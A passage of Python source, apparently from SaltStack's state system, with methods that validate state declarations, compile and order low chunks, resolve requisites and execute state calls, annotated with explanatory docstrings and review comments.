('.py', '.pyx', '.pyo', '.pyc', '.so')):
self.module_refresh()
elif data['fun'] == 'recurse':
self.module_refresh()
elif data['fun'] == 'symlink':
if 'bin' in data['name']:
self.module_refresh()
elif data['state'] in ('pkg', 'ports'):
self.module_refresh()
def verify_ret(self, ret):
'''
Verify the state return data
'''
if not isinstance(ret, dict):
raise SaltException(
'Malformed state return, return must be a dict'
)
bad = []
for val in ['name', 'result', 'changes', 'comment']:
if val not in ret:
bad.append(val)
if bad:
raise SaltException(
('The following keys were not present in the state '
'return: {0}'
).format(','.join(bad)))
def verify_data(self, data):
    '''
    Verify the data, return an error statement if something is wrong

    Checks that the low chunk has the mandatory keys (state, fun, name),
    that the resolved state function exists and receives its required
    parameters, and that no self-referential (recursive) require exists.
    NOTE: this method can mutate ``data`` — a ``watch`` requisite is folded
    into ``require`` when the state module has no ``mod_watch`` function.

    Returns a list of error strings; an empty list means the chunk is valid.
    '''
    errors = []
    if 'state' not in data:
        errors.append('Missing "state" data')
    if 'fun' not in data:
        errors.append('Missing "fun" data')
    if 'name' not in data:
        errors.append('Missing "name" data')
    if data['name'] and not isinstance(data['name'], six.string_types):
        errors.append(
            'ID {0!r} in SLS {1!r} is not formed as a string, but is '
            'a {2}'.format(
                data['name'], data['__sls__'], type(data['name']).__name__)
        )
    if errors:
        # Structural errors make the later lookups unsafe; bail out early
        return errors
    full = data['state'] + '.' + data['fun']
    if full not in self.states:
        if '__sls__' in data:
            errors.append(
                'State \'{0}\' was not found in SLS \'{1}\''.format(
                    full,
                    data['__sls__']
                )
            )
            reason = self.states.missing_fun_string(full)
            if reason:
                errors.append('Reason: {0}'.format(reason))
        else:
            errors.append(
                'Specified state \'{0}\' was not found'.format(
                    full
                )
            )
    else:
        # First verify that the parameters are met
        aspec = salt.utils.args.get_function_argspec(self.states[full])
        arglen = 0
        deflen = 0
        if isinstance(aspec.args, list):
            arglen = len(aspec.args)
        if isinstance(aspec.defaults, tuple):
            deflen = len(aspec.defaults)
        # Args without defaults (the first arglen - deflen) are mandatory
        for ind in range(arglen - deflen):
            if aspec.args[ind] not in data:
                errors.append(
                    'Missing parameter {0} for state {1}'.format(
                        aspec.args[ind],
                        full
                    )
                )
    # If this chunk has a recursive require, then it will cause a
    # recursive loop when executing, check for it
    reqdec = ''
    if 'require' in data:
        reqdec = 'require'
    if 'watch' in data:
        # Check to see if the service has a mod_watch function, if it does
        # not, then just require
        # to just require extend the require statement with the contents
        # of watch so that the mod_watch function is not called and the
        # requisite capability is still used
        if '{0}.mod_watch'.format(data['state']) not in self.states:
            if 'require' in data:
                data['require'].extend(data.pop('watch'))
            else:
                data['require'] = data.pop('watch')
            reqdec = 'require'
        else:
            reqdec = 'watch'
    if reqdec:
        for req in data[reqdec]:
            reqfirst = next(iter(req))
            if data['state'] == reqfirst:
                # Same state type — recursive if the target matches this
                # chunk's own name or ID (fnmatch patterns allowed)
                if (fnmatch.fnmatch(data['name'], req[reqfirst])
                        or fnmatch.fnmatch(data['__id__'], req[reqfirst])):
                    err = ('Recursive require detected in SLS {0} for'
                           ' require {1} in ID {2}').format(
                        data['__sls__'],
                        req,
                        data['__id__'])
                    errors.append(err)
    return errors
def verify_high(self, high):
    '''
    Verify that the high data is viable and follows the data structure

    Walks every ID/state declaration in ``high`` checking types and shape:
    IDs must be strings, bodies dicts, state declarations lists, requisite
    arguments lists of single-key dicts, and exactly one function must be
    declared per state. Also records requisites in ``reqs`` to detect
    mutually recursive require pairs across IDs.

    Returns a list of error strings; empty when the high data is valid.
    '''
    errors = []
    if not isinstance(high, dict):
        errors.append('High data is not a dictionary and is invalid')
    reqs = {}
    for name, body in six.iteritems(high):
        try:
            # Dunder keys (__sls__, __extend__, ...) are metadata, not IDs
            if name.startswith('__'):
                continue
        except AttributeError:
            # Non-string IDs get a proper error below instead
            pass
        if not isinstance(name, six.string_types):
            errors.append(
                'ID {0!r} in SLS {1!r} is not formed as a string, but '
                'is a {2}. It may need to be quoted.'.format(
                    name, body['__sls__'], type(name).__name__)
            )
        if not isinstance(body, dict):
            err = ('The type {0} in {1} is not formatted as a dictionary'
                   .format(name, body))
            errors.append(err)
            continue
        for state in body:
            if state.startswith('__'):
                continue
            if body[state] is None:
                errors.append(
                    'ID {0!r} in SLS {1!r} contains a short declaration '
                    '({2}) with a trailing colon. When not passing any '
                    'arguments to a state, the colon must be omitted.'
                    .format(name, body['__sls__'], state)
                )
                continue
            if not isinstance(body[state], list):
                errors.append(
                    'State {0!r} in SLS {1!r} is not formed as a list'
                    .format(name, body['__sls__'])
                )
            else:
                # fun counts declared functions: a dotted state key
                # (e.g. pkg.installed) already embeds the function
                fun = 0
                if '.' in state:
                    fun += 1
                for arg in body[state]:
                    if isinstance(arg, six.string_types):
                        fun += 1
                        if ' ' in arg.strip():
                            errors.append(('The function "{0}" in state '
                                           '"{1}" in SLS "{2}" has '
                                           'whitespace, a function with whitespace is '
                                           'not supported, perhaps this is an argument '
                                           'that is missing a ":"').format(
                                               arg,
                                               name,
                                               body['__sls__']))
                    elif isinstance(arg, dict):
                        # The arg is a dict, if the arg is require or
                        # watch, it must be a list.
                        #
                        # Add the requires to the reqs dict and check them
                        # all for recursive requisites.
                        argfirst = next(iter(arg))
                        if argfirst == 'names':
                            if not isinstance(arg[argfirst], list):
                                errors.append(
                                    'The \'names\' argument in state '
                                    '{0!r} in SLS {1!r} needs to be '
                                    'formed as a list'
                                    .format(name, body['__sls__'])
                                )
                        if argfirst in ('require', 'watch', 'prereq'):
                            if not isinstance(arg[argfirst], list):
                                errors.append(
                                    'The {0} statement in state {1!r} in '
                                    'SLS {2!r} needs to be formed as a '
                                    'list'.format(argfirst,
                                                  name,
                                                  body['__sls__'])
                                )
                            # It is a list, verify that the members of the
                            # list are all single key dicts.
                            else:
                                reqs[name] = {'state': state}
                                for req in arg[argfirst]:
                                    if not isinstance(req, dict):
                                        err = ('Requisite declaration {0}'
                                               ' in SLS {1} is not formed as a'
                                               ' single key dictionary').format(
                                                   req,
                                                   body['__sls__'])
                                        errors.append(err)
                                        continue
                                    req_key = next(iter(req))
                                    req_val = req[req_key]
                                    if '.' in req_key:
                                        errors.append((
                                            'Invalid requisite type {0!r} '
                                            'in state {1!r}, in SLS '
                                            '{2!r}. Requisite types must '
                                            'not contain dots, did you '
                                            'mean {3!r}?'.format(
                                                req_key,
                                                name,
                                                body['__sls__'],
                                                req_key[:req_key.find('.')]
                                            )
                                        ))
                                    if not ishashable(req_val):
                                        errors.append((
                                            'Illegal requisite "{0}", '
                                            'please check your syntax.\n'
                                        ).format(str(req_val)))
                                        continue

                                    # Check for global recursive requisites
                                    reqs[name][req_val] = req_key
                                    # I am going beyond 80 chars on
                                    # purpose, this is just too much
                                    # of a pain to deal with otherwise
                                    if req_val in reqs:
                                        if name in reqs[req_val]:
                                            if reqs[req_val][name] == state:
                                                if reqs[req_val]['state'] == reqs[name][req_val]:
                                                    err = ('A recursive '
                                                           'requisite was found, SLS '
                                                           '"{0}" ID "{1}" ID "{2}"'
                                                           ).format(
                                                               body['__sls__'],
                                                               name,
                                                               req_val
                                                           )
                                                    errors.append(err)
                        # Make sure that there is only one key in the
                        # dict
                        if len(list(arg)) != 1:
                            errors.append(
                                'Multiple dictionaries defined in '
                                'argument of state {0!r} in SLS {1!r}'
                                .format(name, body['__sls__'])
                            )
                if not fun:
                    # require/watch pseudo-states carry no function
                    if state == 'require' or state == 'watch':
                        continue
                    errors.append(
                        'No function declared in state {0!r} in SLS {1!r}'
                        .format(state, body['__sls__'])
                    )
                elif fun > 1:
                    errors.append(
                        'Too many functions declared in state {0!r} in '
                        'SLS {1!r}'.format(state, body['__sls__'])
                    )
    return errors
def verify_chunks(self, chunks):
    '''
    Verify the chunks in a list of low data structures

    Accumulates the error strings produced by verify_data for every
    low chunk and returns them as a single list.
    '''
    errors = []
    for low in chunks:
        errors.extend(self.verify_data(low))
    return errors
def order_chunks(self, chunks):
    '''
    Sort the chunk list verifying that the chunks follow the order
    specified in the order options.

    Chunks without an explicit order sort after every explicitly ordered
    chunk; 'last' and negative orders sort after those; ties break on the
    state/name/fun string. The list is sorted in place and returned.
    '''
    # Derive the default cap from the highest explicit positive order
    cap = 1
    for low in chunks:
        declared = low.get('order')
        if isinstance(declared, int) and declared > cap - 1 and declared > 0:
            cap = declared + 100
    for low in chunks:
        if 'order' not in low:
            low['order'] = cap
            continue
        if not isinstance(low['order'], (int, float)):
            # 'last' pushes past every capped chunk; anything else
            # non-numeric falls back to the cap
            low['order'] = cap + 1000000 if low['order'] == 'last' else cap
        if 'name_order' in low:
            # Fold the per-name sub-order into the fractional part
            low['order'] = low['order'] + low.pop('name_order') / 10000.0
        if low['order'] < 0:
            # Negative orders sort after the 'last' region offset
            low['order'] = cap + 1000000 + low['order']
    chunks.sort(key=lambda c: (c['order'], '{0[state]}{0[name]}{0[fun]}'.format(c)))
    return chunks
def compile_high_data(self, high):
    '''
    "Compile" the high data as it is retrieved from the CLI or YAML into
    the individual state executor structures

    Flattens each ID/state declaration into one low chunk per declared
    function, expanding a 'names' list into one chunk per entry (tagged
    with 'name_order' so order_chunks can keep their relative order).
    Returns the chunk list already passed through order_chunks.
    '''
    chunks = []
    for name, body in six.iteritems(high):
        if name.startswith('__'):
            continue
        for state, run in six.iteritems(body):
            funcs = set()
            names = set()
            if state.startswith('__'):
                continue
            chunk = {'state': state,
                     'name': name}
            if '__sls__' in body:
                chunk['__sls__'] = body['__sls__']
            if '__env__' in body:
                chunk['__env__'] = body['__env__']
            chunk['__id__'] = name
            for arg in run:
                if isinstance(arg, six.string_types):
                    # A bare string argument is the function name
                    funcs.add(arg)
                    continue
                if isinstance(arg, dict):
                    for key, val in six.iteritems(arg):
                        if key == 'names':
                            names.update(val)
                        elif key == 'state':
                            # Don't pass down a state override
                            continue
                        elif (key == 'name' and
                              not isinstance(val, six.string_types)):
                            # Invalid name, fall back to ID
                            chunk[key] = name
                        else:
                            chunk[key] = val
            if names:
                # One chunk per 'names' entry; a dict entry supplies
                # per-name argument overrides
                name_order = 1
                for entry in names:
                    live = copy.deepcopy(chunk)
                    if isinstance(entry, dict):
                        low_name = next(six.iterkeys(entry))
                        live['name'] = low_name
                        live.update(entry[low_name][0])
                    else:
                        live['name'] = entry
                    live['name_order'] = name_order
                    name_order = name_order + 1
                    for fun in funcs:
                        live['fun'] = fun
                        chunks.append(live)
            else:
                live = copy.deepcopy(chunk)
                for fun in funcs:
                    live['fun'] = fun
                    chunks.append(live)
    chunks = self.order_chunks(chunks)
    return chunks
def reconcile_extend(self, high):
    '''
    Pull the extend data and add it to the respective high data

    Pops '__extend__' from ``high`` and merges each extension chunk into
    the target ID's declarations in place: requisite lists are extended,
    other matching options replaced, and unmatched arguments appended.
    Returns ``(high, errors)`` where errors lists extensions whose target
    ID could not be located.
    '''
    errors = []
    if '__extend__' not in high:
        return high, errors
    ext = high.pop('__extend__')
    for ext_chunk in ext:
        for name, body in six.iteritems(ext_chunk):
            if name not in high:
                # The extend target may be addressed by its 'name'
                # rather than its ID; resolve via the first real state key
                state_type = next(
                    x for x in body if not x.startswith('__')
                )
                # Check for a matching 'name' override in high data
                id_ = find_name(name, state_type, high)
                if id_:
                    name = id_
                else:
                    errors.append(
                        'Cannot extend ID \'{0}\' in \'{1}:{2}\'. It is not '
                        'part of the high state.\n'
                        'This is likely due to a missing include statement '
                        'or an incorrectly typed ID.\nEnsure that a '
                        'state with an ID of \'{0}\' is available\nin '
                        'environment \'{1}\' and to SLS \'{2}\''.format(
                            name,
                            body.get('__env__', 'base'),
                            body.get('__sls__', 'base'))
                    )
                    continue
            for state, run in six.iteritems(body):
                if state.startswith('__'):
                    continue
                if state not in high[name]:
                    high[name][state] = run
                    continue
                # high[name][state] is extended by run, both are lists
                for arg in run:
                    update = False
                    for hind in range(len(high[name][state])):
                        if isinstance(arg, six.string_types) and isinstance(high[name][state][hind], six.string_types):
                            # replacing the function, replace the index
                            high[name][state].pop(hind)
                            high[name][state].insert(hind, arg)
                            update = True
                            continue
                        if isinstance(arg, dict) and isinstance(high[name][state][hind], dict):
                            # It is an option, make sure the options match
                            argfirst = next(iter(arg))
                            if argfirst == next(iter(high[name][state][hind])):
                                # If argfirst is a requisite then we must merge
                                # our requisite with that of the target state
                                if argfirst in STATE_REQUISITE_KEYWORDS:
                                    high[name][state][hind][argfirst].extend(arg[argfirst])
                                # otherwise, its not a requisite and we are just extending (replacing)
                                else:
                                    high[name][state][hind] = arg
                                update = True
                            if (argfirst == 'name' and
                                    next(iter(high[name][state][hind])) == 'names'):
                                # If names are overwritten by name use the name
                                high[name][state][hind] = arg
                    if not update:
                        high[name][state].append(arg)
    return high, errors
def apply_exclude(self, high):
    '''
    Read in the __exclude__ list and remove all excluded objects from the
    high data

    Excludes are either bare strings (sls names), {'sls': pattern} or
    {'id': name} dicts; sls patterns are fnmatch-expanded against each
    ID's __sls__ value. The matching IDs are popped from high in place.
    '''
    if '__exclude__' not in high:
        return high
    excluded_sls = set()
    excluded_ids = set()
    for exc in high.pop('__exclude__'):
        if isinstance(exc, str):
            # The exclude statement is a string, assume it is an sls
            excluded_sls.add(exc)
        if isinstance(exc, dict):
            # Explicitly declared exclude
            if len(exc) != 1:
                continue
            exc_key = next(iter(exc))
            if exc_key == 'sls':
                excluded_sls.add(exc['sls'])
            elif exc_key == 'id':
                excluded_ids.add(exc['id'])
    # Now the excludes have been simplified, use them
    if excluded_sls:
        # There are sls excludes, find the associated ids
        for name, body in high.items():
            if name.startswith('__'):
                continue
            sls = body.get('__sls__', '')
            if not sls:
                continue
            for pattern in excluded_sls:
                if fnmatch.fnmatch(sls, pattern):
                    excluded_ids.add(name)
    for id_ in excluded_ids:
        high.pop(id_, None)
    return high
def requisite_in(self, high):
    '''
    Extend the data reference with requisite_in arguments

    Converts the *_in requisite forms (require_in, watch_in, onfail_in,
    onchanges_in, prereq/prereq_in, use/use_in) into ordinary forward
    requisites by synthesizing '__extend__' entries, then runs
    reconcile_extend to merge them. Returns ``(high, errors)``.
    '''
    req_in = set([
        'require_in',
        'watch_in',
        'onfail_in',
        'onchanges_in',
        'use',
        'use_in',
        'prereq',
        'prereq_in',
    ])
    # All requisite keywords, forward and *_in, skipped when copying
    # arguments for use/use_in
    req_in_all = req_in.union(
        set([
            'require',
            'watch',
            'onfail',
            'onchanges',
        ]))
    extend = {}
    errors = []
    for id_, body in six.iteritems(high):
        if not isinstance(body, dict):
            continue
        for state, run in six.iteritems(body):
            if state.startswith('__'):
                continue
            for arg in run:
                if isinstance(arg, dict):
                    # It is not a function, verify that the arg is a
                    # requisite in statement
                    if len(arg) < 1:
                        # Empty arg dict
                        # How did we get this far?
                        continue
                    # Split out the components
                    key = next(iter(arg))
                    if key not in req_in:
                        continue
                    # 'require_in' -> 'require', 'watch_in' -> 'watch', ...
                    rkey = key.split('_')[0]
                    items = arg[key]
                    if isinstance(items, dict):
                        # Formatted as a single req_in
                        for _state, name in six.iteritems(items):
                            # Not a use requisite_in
                            found = False
                            if name not in extend:
                                extend[name] = {}
                            if '.' in _state:
                                errors.append((
                                    'Invalid requisite in {0}: {1} for '
                                    '{2}, in SLS {3!r}. Requisites must '
                                    'not contain dots, did you mean {4!r}?'
                                    .format(
                                        rkey,
                                        _state,
                                        name,
                                        body['__sls__'],
                                        _state[:_state.find('.')]
                                    )
                                ))
                                _state = _state.split(".")[0]
                            if _state not in extend[name]:
                                extend[name][_state] = []
                            extend[name]['__env__'] = body['__env__']
                            extend[name]['__sls__'] = body['__sls__']
                            for ind in range(len(extend[name][_state])):
                                if next(iter(
                                        extend[name][_state][ind])) == rkey:
                                    # Extending again
                                    extend[name][_state][ind][rkey].append(
                                        {state: id_}
                                    )
                                    found = True
                            if found:
                                continue
                            # The rkey is not present yet, create it
                            extend[name][_state].append(
                                {rkey: [{state: id_}]}
                            )
                    if isinstance(items, list):
                        # Formed as a list of requisite additions
                        # NOTE(review): the loop variable 'ind' is reused
                        # below for an index loop; preserved as-is.
                        for ind in items:
                            if not isinstance(ind, dict):
                                # Malformed req_in
                                continue
                            if len(ind) < 1:
                                continue
                            _state = next(iter(ind))
                            name = ind[_state]
                            if '.' in _state:
                                errors.append((
                                    'Invalid requisite in {0}: {1} for '
                                    '{2}, in SLS {3!r}. Requisites must '
                                    'not contain dots, did you mean {4!r}?'
                                    .format(
                                        rkey,
                                        _state,
                                        name,
                                        body['__sls__'],
                                        _state[:_state.find('.')]
                                    )
                                ))
                                _state = _state.split(".")[0]
                            if key == 'prereq_in':
                                # Add prerequired to origin
                                if id_ not in extend:
                                    extend[id_] = {}
                                if state not in extend[id_]:
                                    extend[id_][state] = []
                                extend[id_][state].append(
                                    {'prerequired': [{_state: name}]}
                                )
                            if key == 'prereq':
                                # Add prerequired to prereqs
                                ext_id = find_name(name, _state, high)
                                if not ext_id:
                                    continue
                                if ext_id not in extend:
                                    extend[ext_id] = {}
                                if _state not in extend[ext_id]:
                                    extend[ext_id][_state] = []
                                extend[ext_id][_state].append(
                                    {'prerequired': [{state: id_}]}
                                )
                                continue
                            if key == 'use_in':
                                # Add the running states args to the
                                # use_in states
                                ext_id = find_name(name, _state, high)
                                if not ext_id:
                                    continue
                                ext_args = state_args(ext_id, _state, high)
                                if ext_id not in extend:
                                    extend[ext_id] = {}
                                if _state not in extend[ext_id]:
                                    extend[ext_id][_state] = []
                                ignore_args = req_in_all.union(ext_args)
                                for arg in high[id_][state]:
                                    if not isinstance(arg, dict):
                                        continue
                                    if len(arg) != 1:
                                        continue
                                    if next(iter(arg)) in ignore_args:
                                        continue
                                    # Don't use name or names
                                    if next(six.iterkeys(arg)) == 'name':
                                        continue
                                    if next(six.iterkeys(arg)) == 'names':
                                        continue
                                    extend[ext_id][_state].append(arg)
                                continue
                            if key == 'use':
                                # Add the use state's args to the
                                # running state
                                ext_id = find_name(name, _state, high)
                                if not ext_id:
                                    continue
                                loc_args = state_args(id_, state, high)
                                if id_ not in extend:
                                    extend[id_] = {}
                                if state not in extend[id_]:
                                    extend[id_][state] = []
                                ignore_args = req_in_all.union(loc_args)
                                for arg in high[ext_id][_state]:
                                    if not isinstance(arg, dict):
                                        continue
                                    if len(arg) != 1:
                                        continue
                                    if next(iter(arg)) in ignore_args:
                                        continue
                                    # Don't use name or names
                                    if next(six.iterkeys(arg)) == 'name':
                                        continue
                                    if next(six.iterkeys(arg)) == 'names':
                                        continue
                                    extend[id_][state].append(arg)
                                continue
                            found = False
                            if name not in extend:
                                extend[name] = {}
                            if _state not in extend[name]:
                                extend[name][_state] = []
                            extend[name]['__env__'] = body['__env__']
                            extend[name]['__sls__'] = body['__sls__']
                            for ind in range(len(extend[name][_state])):
                                if next(iter(
                                        extend[name][_state][ind])) == rkey:
                                    # Extending again
                                    extend[name][_state][ind][rkey].append(
                                        {state: id_}
                                    )
                                    found = True
                            if found:
                                continue
                            # The rkey is not present yet, create it
                            extend[name][_state].append(
                                {rkey: [{state: id_}]}
                            )
    high['__extend__'] = []
    for key, val in six.iteritems(extend):
        high['__extend__'].append({key: val})
    req_in_high, req_in_errors = self.reconcile_extend(high)
    errors.extend(req_in_errors)
    return req_in_high, errors
def call(self, low, chunks=None, running=None):
    '''
    Call a state directly with the low data structure, verify data
    before processing.

    low     -- the low chunk to execute
    chunks  -- the full low chunk list, frozen into __lowstate__
    running -- the accumulated run results, frozen into __running__

    Returns the state's return dict, augmented with __run_num__,
    start_time and duration; when low['__prereq__'] is set, returns the
    test-mode result early from the finally block without those fields.
    '''
    start_time = datetime.datetime.now()
    log.info('Running state [{0}] at time {1}'.format(low['name'], start_time.time().isoformat()))
    errors = self.verify_data(low)
    if errors:
        ret = {
            'result': False,
            'name': low['name'],
            'changes': {},
            'comment': '',
        }
        for err in errors:
            ret['comment'] += '{0}\n'.format(err)
        ret['__run_num__'] = self.__run_num
        self.__run_num += 1
        format_log(ret)
        self.check_refresh(low, ret)
        return ret
    else:
        ret = {'result': False, 'name': low['name'], 'changes': {}}

    if not low.get('__prereq__'):
        log.info(
            'Executing state {0[state]}.{0[fun]} for {0[name]}'.format(
                low
            )
        )

    if 'provider' in low:
        # Providers swap in alternate execution modules
        self.load_modules(low)

    state_func_name = '{0[state]}.{0[fun]}'.format(low)
    cdata = salt.utils.format_call(
        self.states[state_func_name],
        low,
        initial_ret={'full': state_func_name},
        expected_extra_kws=STATE_INTERNAL_KEYWORDS
    )

    inject_globals = {
        # Pass a copy of the running dictionary, the low state chunks and
        # the current state dictionaries.
        # We pass deep copies here because we don't want any misbehaving
        # state module to change these at runtime.
        '__low__': immutabletypes.freeze(low),
        '__running__': immutabletypes.freeze(running) if running else {},
        '__instance_id__': self.instance_id,
        '__lowstate__': immutabletypes.freeze(chunks) if chunks else {}
    }

    if low.get('__prereq__'):
        # Prereq evaluation runs the state module in test mode; save the
        # current test flag so the finally block can restore it
        test = sys.modules[self.states[cdata['full']].__module__].__opts__['test']
        sys.modules[self.states[cdata['full']].__module__].__opts__['test'] = True
    try:
        # Let's get a reference to the salt environment to use within this
        # state call.
        #
        # If the state function accepts an 'env' keyword argument, it
        # allows the state to be overridden(we look for that in cdata). If
        # that's not found in cdata, we look for what we're being passed in
        # the original data, namely, the special dunder __env__. If that's
        # not found we default to 'base'
        if ('unless' in low and '{0[state]}.mod_run_check'.format(low) not in self.states) or \
                ('onlyif' in low and '{0[state]}.mod_run_check'.format(low) not in self.states):
            ret.update(self._run_check(low))

        if 'saltenv' in low:
            inject_globals['__env__'] = str(low['saltenv'])
        elif isinstance(cdata['kwargs'].get('env', None), six.string_types):
            # User is using a deprecated env setting which was parsed by
            # format_call.
            # We check for a string type since module functions which
            # allow setting the OS environ also make use of the "env"
            # keyword argument, which is not a string
            inject_globals['__env__'] = str(cdata['kwargs']['env'])
        elif '__env__' in low:
            # The user is passing an alternative environment using __env__
            # which is also not the appropriate choice, still, handle it
            inject_globals['__env__'] = str(low['__env__'])
        else:
            # Let's use the default environment
            inject_globals['__env__'] = 'base'

        # Skip the actual call when _run_check already produced a result
        if 'result' not in ret or ret['result'] is False:
            with context.func_globals_inject(self.states[cdata['full']],
                                             **inject_globals):
                ret = self.states[cdata['full']](*cdata['args'],
                                                **cdata['kwargs'])
        if 'check_cmd' in low and '{0[state]}.mod_run_check_cmd'.format(low) not in self.states:
            ret.update(self._run_check_cmd(low))
        self.verify_ret(ret)
    except Exception:
        trb = traceback.format_exc()
        # There are a number of possibilities to not have the cdata
        # populated with what we might have expected, so just be smart
        # enough to not raise another KeyError as the name is easily
        # guessable and fallback in all cases to present the real
        # exception to the user
        if len(cdata['args']) > 0:
            name = cdata['args'][0]
        elif 'name' in cdata['kwargs']:
            name = cdata['kwargs']['name']
        else:
            name = low.get('name', low.get('__id__'))
        ret = {
            'result': False,
            'name': name,
            'changes': {},
            'comment': 'An exception occurred in this state: {0}'.format(
                trb)
        }
    finally:
        if low.get('__prereq__'):
            sys.modules[self.states[cdata['full']].__module__].__opts__[
                'test'] = test

        # If format_call got any warnings, let's show them to the user
        if 'warnings' in cdata:
            ret.setdefault('warnings', []).extend(cdata['warnings'])

        if 'provider' in low:
            self.load_modules()

        if low.get('__prereq__'):
            low['__prereq__'] = False
            # NOTE: returning from finally — prereq results skip the
            # run-number/timing bookkeeping below by design
            return ret

    ret['__run_num__'] = self.__run_num
    self.__run_num += 1
    format_log(ret)
    self.check_refresh(low, ret)
    finish_time = datetime.datetime.now()
    ret['start_time'] = start_time.time().isoformat()
    delta = (finish_time - start_time)
    # duration in milliseconds.microseconds
    ret['duration'] = (delta.seconds * 1000000 + delta.microseconds)/1000.0
    log.info('Completed state [{0}] at time {1}'.format(low['name'], finish_time.time().isoformat()))
    return ret
def call_chunks(self, chunks):
    '''
    Iterate over a list of chunks and call them, checking for requires.

    Stops early when a failhard signal is raised, either via the
    __FAILHARD__ marker left in running or via check_failhard.
    '''
    running = {}
    for low in chunks:
        if '__FAILHARD__' in running:
            # A nested call_chunk flagged failhard: strip the marker
            # and abort the remaining chunks
            running.pop('__FAILHARD__')
            return running
        if _gen_tag(low) not in running:
            running = self.call_chunk(low, running, chunks)
            if self.check_failhard(low, running):
                return running
    self.active = set()
    return running
def check_failhard(self, low, running):
    '''
    Check if the low data chunk should send a failhard signal

    Returns True when failhard is requested (on the chunk or globally
    via opts) and the chunk's recorded result is a failure.
    '''
    tag = _gen_tag(low)
    # Parenthesize so ``tag in running`` guards BOTH failhard sources:
    # without it, ``and`` binds tighter than ``or`` and a chunk-level
    # failhard with no result recorded yet raises KeyError on
    # running[tag] below.
    if ((low.get('failhard', False) or self.opts['failhard'])
            and tag in running):
        return not running[tag]['result']
    return False
def check_requisite(self, low, running, chunks, pre=False):
    '''
    Look into the running data to check the status of all requisite
    states

    Resolves each requisite of ``low`` against ``chunks`` and inspects
    the results accumulated in ``running`` (or ``self.pre`` for prereq).
    NOTE: can mutate ``low`` — a watch requisite is folded into require
    when the state module lacks mod_watch.

    Returns ``(status, reqs)`` where status is one of 'met', 'unmet',
    'fail', 'pre', 'onfail', 'onchanges' or 'change', and reqs maps
    requisite type to the matched chunks ('()' when nothing to check or
    a requisite target was not found).
    '''
    present = False
    # If mod_watch is not available make it a require
    if 'watch' in low:
        if '{0}.mod_watch'.format(low['state']) not in self.states:
            if 'require' in low:
                low['require'].extend(low.pop('watch'))
            else:
                low['require'] = low.pop('watch')
        else:
            present = True
    if 'require' in low:
        present = True
    if 'prerequired' in low:
        present = True
    if 'prereq' in low:
        present = True
    if 'onfail' in low:
        present = True
    if 'onchanges' in low:
        present = True
    if not present:
        return 'met', ()
    reqs = {
        'require': [],
        'watch': [],
        'prereq': [],
        'onfail': [],
        'onchanges': []}
    if pre:
        reqs['prerequired'] = []
    for r_state in reqs:
        if r_state in low and low[r_state] is not None:
            for req in low[r_state]:
                req = trim_req(req)
                found = False
                for chunk in chunks:
                    req_key = next(iter(req))
                    req_val = req[req_key]
                    if req_val is None:
                        continue
                    if req_key == 'sls':
                        # Allow requisite tracking of entire sls files
                        if fnmatch.fnmatch(chunk['__sls__'], req_val):
                            found = True
                            reqs[r_state].append(chunk)
                        continue
                    if (fnmatch.fnmatch(chunk['name'], req_val) or
                            fnmatch.fnmatch(chunk['__id__'], req_val)):
                        if chunk['state'] == req_key:
                            found = True
                            reqs[r_state].append(chunk)
                if not found:
                    # Unresolvable requisite: caller reports the error
                    return 'unmet', ()
    fun_stats = set()
    # NOTE(review): 'chunks' is intentionally rebound here, shadowing the
    # parameter — preserved as-is.
    for r_state, chunks in six.iteritems(reqs):
        if r_state == 'prereq':
            run_dict = self.pre
        else:
            run_dict = running
        for chunk in chunks:
            tag = _gen_tag(chunk)
            if tag not in run_dict:
                fun_stats.add('unmet')
                continue
            if r_state == 'onfail':
                if run_dict[tag]['result'] is True:
                    fun_stats.add('onfail')
                    continue
            else:
                if run_dict[tag]['result'] is False:
                    fun_stats.add('fail')
                    continue
            if r_state == 'onchanges':
                if not run_dict[tag]['changes']:
                    fun_stats.add('onchanges')
                else:
                    fun_stats.add('onchangesmet')
                continue
            if r_state == 'watch' and run_dict[tag]['changes']:
                fun_stats.add('change')
                continue
            if r_state == 'prereq' and run_dict[tag]['result'] is None:
                fun_stats.add('premet')
            # NOTE(review): the 'else' below pairs with THIS if, so a
            # prereq with result None adds both 'premet' and 'met' —
            # preserved as-is.
            if r_state == 'prereq' and not run_dict[tag]['result'] is None:
                fun_stats.add('pre')
            else:
                fun_stats.add('met')

    # Collapse the gathered stats into a single status, most severe first
    if 'unmet' in fun_stats:
        status = 'unmet'
    elif 'fail' in fun_stats:
        status = 'fail'
    elif 'pre' in fun_stats:
        if 'premet' in fun_stats:
            status = 'met'
        else:
            status = 'pre'
    elif 'onfail' in fun_stats:
        status = 'onfail'
    elif 'onchanges' in fun_stats and 'onchangesmet' not in fun_stats:
        status = 'onchanges'
    elif 'change' in fun_stats:
        status = 'change'
    else:
        status = 'met'

    return status, reqs
def event(self, chunk_ret, length, fire_event=False):
    '''
    Fire an event on the master bus

    If `fire_event` is set to True an event will be sent with the
    chunk name in the tag and the chunk result in the event data.

    If `fire_event` is set to a string such as `mystate/is/finished`,
    an event will be sent with the string added to the tag and the chunk
    result in the event data.

    If the `state_events` is set to True in the config, then after the
    chunk is evaluated an event will be set up to the master with the
    results.
    '''
    # Fire only when not masterless, when events are wanted (globally or
    # for this chunk), and when a master_uri is configured.
    if self.opts.get('local'):
        return
    if not (self.opts.get('state_events', True) or fire_event):
        return
    if not self.opts.get('master_uri'):
        return
    ret = {'ret': chunk_ret}
    if fire_event is True:
        parts = [self.jid, self.opts['id'], str(chunk_ret['name'])]
        tag = salt.utils.event.tagify(parts, 'state_result')
    elif isinstance(fire_event, six.string_types):
        parts = [self.jid, self.opts['id'], str(fire_event)]
        tag = salt.utils.event.tagify(parts, 'state_result')
    else:
        parts = [self.jid, 'prog', self.opts['id'], str(chunk_ret['__run_num__'])]
        tag = salt.utils.event.tagify(parts, 'job')
    ret['len'] = length
    preload = {'jid': self.jid}
    self.functions['event.fire_master'](ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
    '''
    Check if a chunk has any requires, execute the requires and then
    the chunk

    Recursively runs the chunk's requisites first, then dispatches on
    the requisite status from check_requisite (met/unmet/fail/change/
    pre/onfail/onchanges). Results are recorded in ``running`` keyed by
    the chunk tag; prereq evaluations go into ``self.pre`` instead.
    Returns the updated ``running`` dict.
    '''
    low = self._mod_aggregate(low, running, chunks)
    self._mod_init(low)
    tag = _gen_tag(low)
    if not low.get('prerequired'):
        self.active.add(tag)
    requisites = ['require', 'watch', 'prereq', 'onfail', 'onchanges']
    if not low.get('__prereq__'):
        requisites.append('prerequired')
        status, reqs = self.check_requisite(low, running, chunks, True)
    else:
